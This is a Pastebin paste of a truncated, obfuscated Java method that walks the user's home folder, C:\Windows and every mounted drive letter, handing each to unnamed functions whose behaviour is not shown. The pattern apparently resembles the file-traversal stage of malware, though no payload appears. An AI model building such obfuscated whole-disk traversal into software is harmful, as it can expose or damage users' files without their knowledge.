Advertisement
Guest User

Untitled

a guest
Nov 27th, 2015
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. private static void hM() {
  2. c(new File(System.getProperty("user.home")));
  3. c(new File("C:\\Windows"));
  4. for (char c = 'A'; c < 'Z'; ++c) {
  5. final File file;
  6. if ((file = new File(String.valueOf(c) + ":/")).exists()) {
  7. c(file);
  8. b.a(file);
  9. }
  10. }
  11. try {
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement